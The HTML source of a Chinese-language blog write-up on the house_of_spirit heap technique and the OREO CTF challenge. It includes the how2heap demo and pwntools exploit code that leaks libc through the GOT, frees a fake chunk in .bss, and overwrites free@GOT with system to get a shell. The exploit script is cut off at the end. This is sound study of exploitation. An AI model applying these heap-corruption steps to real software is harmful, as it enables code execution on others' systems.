<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    hostname: new URL('http://yoursite.com').hostname,
    root: '/',
    scheme: 'Muse',
    version: '7.7.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    comments: {"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}
  };
</script>

  <meta name="description" content="how2heap - house_of_spirit&amp;OREOubuntu 16.04  libc2.23 house_of_spirit.c1234567891011121314151617181920212223242526272829303132333435#include &lt;stdio.h&gt;#include &lt;stdlib.h&gt;int main()&amp;#123">
<meta property="og:type" content="article">
<meta property="og:title" content="how2heap - fastbin_dup_consolidate&amp;SleepyHolder">
<meta property="og:url" content="http://yoursite.com/2020/02/06/how2heap-house-of-spirit-OREO/index.html">
<meta property="og:site_name" content="Coldshiel&#39;s blog">
<meta property="og:description" content="how2heap - house_of_spirit&amp;OREOubuntu 16.04  libc2.23 house_of_spirit.c1234567891011121314151617181920212223242526272829303132333435#include &lt;stdio.h&gt;#include &lt;stdlib.h&gt;int main()&amp;#123">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yoursite.com/2020/02/06/how2heap-house-of-spirit-OREO/1580794910542.png">
<meta property="og:image" content="http://yoursite.com/2020/02/06/how2heap-house-of-spirit-OREO/1580795039645.png">
<meta property="og:image" content="http://yoursite.com/2020/02/06/how2heap-house-of-spirit-OREO/1580795339441.png">
<meta property="og:image" content="http://yoursite.com/2020/02/06/how2heap-house-of-spirit-OREO/1580813725716.png">
<meta property="og:image" content="http://yoursite.com/2020/02/06/how2heap-house-of-spirit-OREO/1580798688028.png">
<meta property="og:image" content="http://yoursite.com/2020/02/06/how2heap-house-of-spirit-OREO/1580813775276.png">
<meta property="og:image" content="http://yoursite.com/2020/02/06/how2heap-house-of-spirit-OREO/1580813832897.png">
<meta property="og:image" content="http://yoursite.com/2020/02/06/how2heap-house-of-spirit-OREO/1580813868490.png">
<meta property="og:image" content="http://yoursite.com/2020/02/06/how2heap-house-of-spirit-OREO/1580813953372.png">
<meta property="og:image" content="http://yoursite.com/2020/02/06/how2heap-house-of-spirit-OREO/1580800304100.png">
<meta property="og:image" content="http://yoursite.com/2020/02/06/how2heap-house-of-spirit-OREO/1580813997114.png">
<meta property="og:image" content="http://yoursite.com/2020/02/06/how2heap-house-of-spirit-OREO/1580814080828.png">
<meta property="article:published_time" content="2020-02-07T07:30:16.000Z">
<meta property="article:modified_time" content="2020-02-29T08:15:04.181Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2020/02/06/how2heap-house-of-spirit-OREO/1580794910542.png">

<link rel="canonical" href="http://yoursite.com/2020/02/06/how2heap-house-of-spirit-OREO/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>how2heap - fastbin_dup_consolidate&SleepyHolder | Coldshiel's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Coldshiel's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/02/06/how2heap-house-of-spirit-OREO/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Coldshiel's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          how2heap - fastbin_dup_consolidate&SleepyHolder
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-02-06 23:30:16" itemprop="dateCreated datePublished" datetime="2020-02-06T23:30:16-08:00">2020-02-06</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-02-29 00:15:04" itemprop="dateModified" datetime="2020-02-29T00:15:04-08:00">2020-02-29</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="how2heap-house-of-spirit-amp-OREO"><a href="#how2heap-house-of-spirit-amp-OREO" class="headerlink" title="how2heap - house_of_spirit&amp;OREO"></a>how2heap - house_of_spirit&amp;OREO</h1><p>ubuntu 16.04  libc2.23</p>
<h1 id="house-of-spirit-c"><a href="#house-of-spirit-c" class="headerlink" title="house_of_spirit.c"></a>house_of_spirit.c</h1><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"This file demonstrates the house of spirit attack.\n"</span>);</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Calling malloc() once so that it sets up its memory.\n"</span>);</span><br><span class="line">	<span class="built_in">malloc</span>(<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"We will now overwrite a pointer to point to a fake 'fastbin' region.\n"</span>);</span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">long</span> <span class="keyword">long</span> *a;</span><br><span class="line">	<span class="comment">// This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)</span></span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">long</span> <span class="keyword">long</span> fake_chunks[<span class="number">10</span>] __attribute__ ((aligned (<span class="number">16</span>)));</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n"</span>, <span class="keyword">sizeof</span>(fake_chunks), &amp;fake_chunks[<span class="number">1</span>], &amp;fake_chunks[<span class="number">9</span>]);</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"This chunk.size of this region has to be 16 more than the region (to accommodate the chunk data) while still falling into the fastbin category (&lt;= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n"</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n"</span>);</span><br><span class="line">	fake_chunks[<span class="number">1</span>] = <span class="number">0x40</span>; <span class="comment">// this is the size</span></span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"The chunk.size of the *next* fake region has to be sane. That is &gt; 2*SIZE_SZ (&gt; 16 on x64) &amp;&amp; &lt; av-&gt;system_mem (&lt; 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n"</span>);</span><br><span class="line">        <span class="comment">// fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8</span></span><br><span class="line">	fake_chunks[<span class="number">9</span>] = <span class="number">0x1234</span>; <span class="comment">// nextsize</span></span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n"</span>, &amp;fake_chunks[<span class="number">1</span>]);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n"</span>);</span><br><span class="line">	a = &amp;fake_chunks[<span class="number">2</span>];</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Freeing the overwritten pointer.\n"</span>);</span><br><span class="line">	<span class="built_in">free</span>(a);</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n"</span>, &amp;fake_chunks[<span class="number">1</span>], &amp;fake_chunks[<span class="number">2</span>]);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"malloc(0x30): %p\n"</span>, <span class="built_in">malloc</span>(<span class="number">0x30</span>));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>基本就是初始化堆之后，在栈上通过伪造一个chunk来free然后malloc出来</p>
<p>记两句吧：</p>
<p>在栈上伪造fake chunk时，next chunk.size要满足条件才能通过free的检查</p>
<p>The chunk.size of the <em>next</em> fake region has to be sane. That is &gt; <strong>2*SIZE_SZ (&gt; 16 on x64) &amp;&amp; &lt; av-&gt;system_mem (&lt; 128kb by default for the main arena)</strong> to pass the nextsize integrity checks. No need for fastbin size.</p>
<p>fake chunk的地址需要16字节对齐（x64），所以在申请临时变量时才用到了<code>__attribute__ ((aligned (16)))</code></p>
<p>note that the memory address of the <em>region</em> associated with this chunk must be 16-byte aligned.</p>
<h2 id="Debug"><a href="#Debug" class="headerlink" title="Debug"></a>Debug</h2><p>fake chunk伪造完成之后栈上布局如图所示：</p>
<img src="/2020/02/06/how2heap-house-of-spirit-OREO/1580794910542.png" width="90%" height="90%">

<p>free之后：</p>
<img src="/2020/02/06/how2heap-house-of-spirit-OREO/1580795039645.png" width="60%" height="60%">

<p>再次malloc结束之后可以看到RAX中的返回值便是fake chunk的data region</p>
<img src="/2020/02/06/how2heap-house-of-spirit-OREO/1580795339441.png" width="60%" height="60%">

<h1 id="OREO"><a href="#OREO" class="headerlink" title="OREO"></a>OREO</h1><p>写了好久的x64 heap这次总算碰到一个x86的 : )</p>
<h2 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h2><p>（经过分析之后先逆出了结构体和符号）</p>
<h3 id="main函数："><a href="#main函数：" class="headerlink" title="main函数："></a>main函数：</h3><img src="/2020/02/06/how2heap-house-of-spirit-OREO/1580813725716.png" width="70%" height="70%">

<p>main函数就是一段初始化，然后进入menu</p>
<h3 id="menu"><a href="#menu" class="headerlink" title="menu"></a>menu</h3><img src="/2020/02/06/how2heap-house-of-spirit-OREO/1580798688028.png" width="45%" height="45%">

<p>通过<code>fgets(&amp;s, 0x20, stdin);</code>和<code>__isoc99_sscanf(&amp;s, &quot;%u&quot;, &amp;v1)</code>的组合来输入然后switch</p>
<h3 id="lt-Rifile-structure-gt"><a href="#lt-Rifile-structure-gt" class="headerlink" title="&lt;Rifile structure&gt;"></a>&lt;Rifile structure&gt;</h3><p>分析下面几个函数时，先逆出程序用到的一个结构体，具体如下</p>
<img src="/2020/02/06/how2heap-house-of-spirit-OREO/1580813775276.png" width="60%" height="60%">

<h3 id="add"><a href="#add" class="headerlink" title="add"></a>add</h3><img src="/2020/02/06/how2heap-house-of-spirit-OREO/1580813832897.png" width="80%" height="80%">

<p>具体就是一个链表添加、结构体填充的操作（先填<code>forward_ptr</code>，再输入），全局变量head_ptr存放链表头指针，每次malloc一个refle（fast chunk），然后从对应的位置用<code>fgets</code>输入。两处溢出：<code>refle_name</code>处的溢出可以覆盖到下一个chunk的0x19字节内容，<code>newL_to_zero</code>是将最后的换行符换成<code>\x00</code>，最后<code>++refle_num</code></p>
<p><em>ps：<code>fgets(,n,)</code>时会读取 n-1个字符，并且包括 <code>\n</code>，如果输入字符的长度（不包括 <code>\n</code>）大于等于 n-1,则截取输入中前 n-1个字符（此时没有 <code>\n</code>）并把第 n个字符处填充成 <code>\x00</code>。当输入长度小于 n-1时，会把 <code>\n</code>也读入，并在 <code>\n</code>后面一个字节处填充 <code>\x00</code>（直接回车也会）</em></p>
<h3 id="Show-added-rifles"><a href="#Show-added-rifles" class="headerlink" title="Show added rifles"></a>Show added rifles</h3><img src="/2020/02/06/how2heap-house-of-spirit-OREO/1580813868490.png" width="80%" height="80%">

<p>根据链表输出所有<code>refle</code>的内容</p>
<h3 id="order"><a href="#order" class="headerlink" title="order"></a>order</h3><img src="/2020/02/06/how2heap-house-of-spirit-OREO/1580813953372.png" width="60%" height="60%">

<p>判断<code>refle_num</code>是否为0，不为0则获取链表头指针之后free掉链表上的每一个chunk，然后把头指针<code>head_ptr</code>置零，chunk中的<code>forward_refle_ptr</code>没有置零。然后<code>++ordered_num</code></p>
<h3 id="leave-message"><a href="#leave-message" class="headerlink" title="leave_message"></a>leave_message</h3><img src="/2020/02/06/how2heap-house-of-spirit-OREO/1580800304100.png" width="65%" height="65%">

<p>输入0x80长度的notice到notice_ptr所指向的区域</p>
<h3 id="show-stats"><a href="#show-stats" class="headerlink" title="show_stats"></a>show_stats</h3><img src="/2020/02/06/how2heap-house-of-spirit-OREO/1580813997114.png" width="55%" height="55%">

<p>输出<code>refle_num</code>，<code>ordered_num</code> ，<code>notice</code></p>
<h2 id="Exploit"><a href="#Exploit" class="headerlink" title="Exploit"></a>Exploit</h2><p>程序本身没有进行 setbuf 操作，所以在执行输入输出操作的时候会申请缓冲区，初次调用 puts 时，malloc会分配缓冲区1024B 给stdout / 初次调用fgets时，malloc会分配缓冲区1024B 给stdin</p>
<p>所以一上来程序heap视图中就会有两个chunk，暂时觉得是知道怎么来的就好了 :(</p>
<p>这种链表题第一次自己写好像没有思路，先记录一下能想到东西吧</p>
<h3 id="leak："><a href="#leak：" class="headerlink" title="leak："></a>leak：</h3><p>leak libc的话，主要思路是通过溢出修改<code>forward_ptr</code>，使其指向对应GOT表的一些偏移，然后show added rifles时可以把函数的地址打印出来，leak chunk地址也可以通过这个方法，把<code>forward_ptr</code>改成<code>head_ptr</code>地址即可</p>
<p>leak stack好像行不通…</p>
<h3 id="Arbitrary-write："><a href="#Arbitrary-write：" class="headerlink" title="Arbitrary write："></a>Arbitrary write：</h3><p>程序只有三个输入点</p>
<ol>
<li>switch时调用的<code>fgets</code>和<code>sscanf</code>组合（应该没什么用，输入指针都是栈上的偏移）</li>
<li>add中的fgets，指针是对于结构体（chunk）的偏移，但是head_ptr的值在其中不可控，是malloc返回后直接输入的</li>
<li>leave_message中的<code>fgets(notice_ptr, 0x80, stdin);</code>这个是根据bss段上的一个指针来读取内容的</li>
</ol>
<p><em>ps：然后……过了好久终于才把house_of_spirit和这个题结合起来，我太stupid了</em></p>
<p>可以通过修改<code>forward_ptr</code>，指向一个bss段上有我们可控值的地方</p>
<img src="/2020/02/06/how2heap-house-of-spirit-OREO/1580814080828.png" width="45%" height="45%">

<p>举例子拿上面第一个个8B对齐的地址来说，如果我们add一个chunk然后修改<code>forward_ptr</code>指向这里，此时0x0804A29c处的值就是fake chunk的size字段，当然这里不可控所以我们要用第二个：0x0804A2A0，此时<code>refle_num</code>是可控的。</p>
<p>然后order的时候这块内存也会被free出来，只要我们保证house_of_spirit.c中提到的fake next chunk的size段是正常的就可以被正常free（对应的size段在notice上，对应在notice上的偏移为：0x0804A2A0+0x40+4-0x0x0804A2C0=36）</p>
<p>接着这块内存就可以被正常malloc出来，这个时候就有了可控的<code>notice_ptr</code>，然后再通过leave_message就可以达成Arbitrary write了！（自己花时间想出来了太开心 XD）</p>
<h3 id="实现"><a href="#实现" class="headerlink" title="实现"></a>实现</h3><h4 id="leaklibc"><a href="#leaklibc" class="headerlink" title="leaklibc"></a>leaklibc</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">printf_GOT=<span class="number">0x0804A234</span></span><br><span class="line">libc_base=<span class="number">0</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leaklibc</span><span class="params">()</span>:</span></span><br><span class="line">        add(<span class="string">'a'</span>*<span class="number">27</span>+p32(printf_GOT),<span class="string">'b'</span>*<span class="number">0x23</span>)<span class="comment">#change forward_ptr by refle_name</span></span><br><span class="line">        show_added_rifles()</span><br><span class="line">        p.recvuntil(<span class="string">'Description: '</span>)</span><br><span class="line">        p.recvuntil(<span class="string">'Description: '</span>)</span><br><span class="line">        <span class="keyword">global</span> libc_base</span><br><span class="line">        libc_base=my_u32(p.recv(<span class="number">4</span>))<span class="number">-0x49670</span></span><br></pre></td></tr></table></figure>

<h4 id="free-target-chunk"><a href="#free-target-chunk" class="headerlink" title="free target chunk"></a>free target chunk</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#Cycle to fakesize=0x3f</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0x3f</span>):</span><br><span class="line">        add(<span class="string">'name'</span>,<span class="string">'description'</span>)</span><br><span class="line">order()</span><br><span class="line"></span><br><span class="line">leave_message(<span class="string">'\x00'</span>*<span class="number">36</span>+p32(<span class="number">0x41</span>))<span class="comment">#Set fake next chunk size</span></span><br><span class="line"></span><br><span class="line">add(<span class="string">'a'</span>*<span class="number">27</span>+p32(<span class="number">0x0804A2A8</span>),<span class="string">'b'</span>*<span class="number">0x23</span>)</span><br><span class="line">order()<span class="comment">#Free our bss memory out</span></span><br></pre></td></tr></table></figure>

<p>先add 0x3f个rifle然后order，目标chunk的size被设置成0x3f，然后构造fake next size来过free的检查，接着再add一个<code>forward_ptr</code>为目标chunk的rifle，此时目标chunk的size为0x40，然后free出目标chunk</p>
<h4 id="set-GOT"><a href="#set-GOT" class="headerlink" title="set GOT"></a>set GOT</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">log.info(<span class="string">"\033[1;36m"</span> + <span class="string">'free out'</span> + <span class="string">"\033[0m"</span>)</span><br><span class="line">add(<span class="string">'name'</span>,p32(free_GOT))<span class="comment">#Set notice_ptr to free_GOT</span></span><br><span class="line"></span><br><span class="line">leaklibc()<span class="comment">#Now leak libc</span></span><br><span class="line">log.info(<span class="string">"\033[1;36m"</span> + <span class="string">'libc_base:'</span>+hex(libc_base) + <span class="string">"\033[0m"</span>)</span><br><span class="line"></span><br><span class="line">leave_message(p32(system_offset+libc_base)+p32(fgets_offset+libc_base))<span class="comment">#Set free_GOT to system</span></span><br></pre></td></tr></table></figure>

<p>再次malloc的时候就可以把目标chunk malloc出来了，然后直接在<code>notice_ptr</code>处填入free函数的GOT表地址</p>
<p>接着将system函数的实际地址填到free_GOT去</p>
<p><em>ps：leaklibc的操作要放到后面，要不然前面 leak之后再调用 order会出错，以及这里 free函数和 fgets的 GOT表项挨在一起，用 fgets 只填入 system 函数地址的话 fgets 的 GOT表项会被损坏（具体见前面所写的 fgets流程），程序往后运行会出错，所以这里填了两个</em></p>
<h4 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="string">'/bin/sh'</span>,<span class="string">'/bin/sh'</span>)<span class="comment">#Set /bin/sh for system(linked list head)</span></span><br><span class="line">order()<span class="comment">#free(head_ptr)=system(binsh_ptr)</span></span><br></pre></td></tr></table></figure>

<p>这个应该不用解释了</p>
<h2 id="完整exp"><a href="#完整exp" class="headerlink" title="完整exp"></a>完整exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> __future__ <span class="keyword">import</span> print_function</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">binary = <span class="string">'./oreo'</span>	<span class="comment">#binary's name here</span></span><br><span class="line">context.binary = binary		<span class="comment">#context here</span></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">pty = process.PTY</span><br><span class="line">p = process(binary, aslr = <span class="number">1</span>, stdin=pty, stdout=pty)	<span class="comment">#process option here</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">Host =</span></span><br><span class="line"><span class="string">Port =</span></span><br><span class="line"><span class="string">p = remote(Host,Port)</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">elf = ELF(binary)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">my_u64 = <span class="keyword">lambda</span> x: u64(x.ljust(<span class="number">8</span>, <span class="string">'\0'</span>))</span><br><span class="line">my_u32 = <span class="keyword">lambda</span> x: u32(x.ljust(<span class="number">4</span>, <span class="string">'\0'</span>))</span><br><span class="line">ub_offset = <span class="number">0x3c4b30</span></span><br><span class="line">codebase = <span class="number">0x555555554000</span></span><br><span class="line"><span class="comment">#log.info("\033[1;36m" + hex(bin_addr) + "\033[0m")</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># todo here</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(name,description)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Action: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'Rifle name: '</span>)</span><br><span class="line">	p.sendline(name)</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'Rifle description: '</span>)</span><br><span class="line">	p.sendline(description)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show_added_rifles</span><span class="params">()</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Action: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'2'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">order</span><span class="params">()</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Action: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'3'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leave_message</span><span class="params">(notice)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Action: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'4'</span>)</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'your order: '</span>)</span><br><span class="line">	p.sendline(notice)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show_stats</span><span class="params">()</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Action: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'5'</span>)</span><br><span class="line"></span><br><span class="line">printf_GOT=<span class="number">0x0804A234</span></span><br><span class="line">libc_base=<span class="number">0</span></span><br><span class="line">system_offset=<span class="number">0x3ada0</span></span><br><span class="line">free_GOT=<span class="number">0x0804A238</span></span><br><span class="line">fgets_offset=<span class="number">0x5e150</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leaklibc</span><span class="params">()</span>:</span></span><br><span class="line">	add(<span class="string">'a'</span>*<span class="number">27</span>+p32(printf_GOT),<span class="string">'b'</span>*<span 